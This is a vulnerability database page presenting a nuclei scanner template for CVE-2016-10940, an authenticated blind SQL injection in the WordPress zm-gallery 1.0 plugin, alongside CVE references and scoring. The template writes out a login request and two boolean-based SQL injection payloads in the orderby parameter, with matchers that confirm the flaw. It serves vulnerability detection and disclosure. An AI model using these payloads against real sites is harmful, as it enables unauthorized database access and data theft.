Lucene search
K

WordPress zm-gallery plugin 1.0 SQL Injection

🗓️ 25 Jun 2026 05:45:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

WordPress zm-gallery plugin 1.0 SQL Injection via order parameter. Vulnerability allows unauthorized access, data leakage, and data manipulation

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2016-10940
13 Sep 201916:28
circl
CNVD
WordPress zm-gallery plugin SQL injection vulnerability
17 Sep 201900:00
cnvd
CVE
CVE-2016-10940
13 Sep 201911:49
cve
Cvelist
CVE-2016-10940
13 Sep 201911:49
cvelist
NVD
CVE-2016-10940
13 Sep 201912:15
nvd
OSV
CVE-2016-10940
13 Sep 201912:15
osv
Prion
Sql injection
13 Sep 201912:15
prion
RedhatCVE
CVE-2016-10940
22 May 202503:46
redhatcve
wpexploit
ZM Gallery 1.0 – Authenticated Blind SQL Injection
14 Dec 201600:00
wpexploit
WPVulnDB
ZM Gallery 1.0 – Authenticated Blind SQL Injection
14 Dec 201600:00
wpvulndb
Rows per page
id: CVE-2016-10940

info:
  name: WordPress zm-gallery plugin 1.0 SQL Injection
  author: cckuailong,daffainfo
  severity: high
  description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Update to the latest version of the zm-gallery plugin or apply the patch provided by the vendor.
  reference:
    - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6
    - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10940
    - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
    - https://wordpress.org/plugins/zm-gallery/#developers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2016-10940
    cwe-id: CWE-89
    epss-score: 0.05523
    epss-percentile: 0.91794
    cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: zm-gallery_project
    product: zm-gallery
    framework: wordpress
  tags: cve,cve2016,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,zm-gallery_project,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200'
          - 'contains(body_2, "[zm_gallery id=")'
          - 'contains(body_2, "<th scope=\"row\" class=\"check-column\">")'
          - '!contains(body_3, "<th scope=\"row\" class=\"check-column\">")'
        condition: and
# digest: 490a00463044022071b438b924db8f92c405553d339c8244a51976b633d6816154117003d4d1970402200d2d20c0912dc8a2c279bbadf598f80609049993f6135e009385a5490ab7d5ff:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 26.5
CVSS 3.17.2
EPSS0.05523
13